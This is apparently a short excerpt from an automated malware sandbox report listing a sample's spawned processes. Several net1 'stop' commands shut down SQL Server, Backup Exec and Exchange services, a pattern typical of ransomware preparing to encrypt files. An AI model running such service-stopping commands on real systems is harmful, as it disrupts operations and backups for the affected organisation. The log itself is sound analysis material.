C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6828
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6372
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y 1⤵ PID:5816
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y 1⤵ PID:6332
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSExchangeMGMT /y 1⤵ PID:6272
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSExchangeIS /y 1⤵ PID:5932
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6696
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7052
C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup 1⤵ PID:6220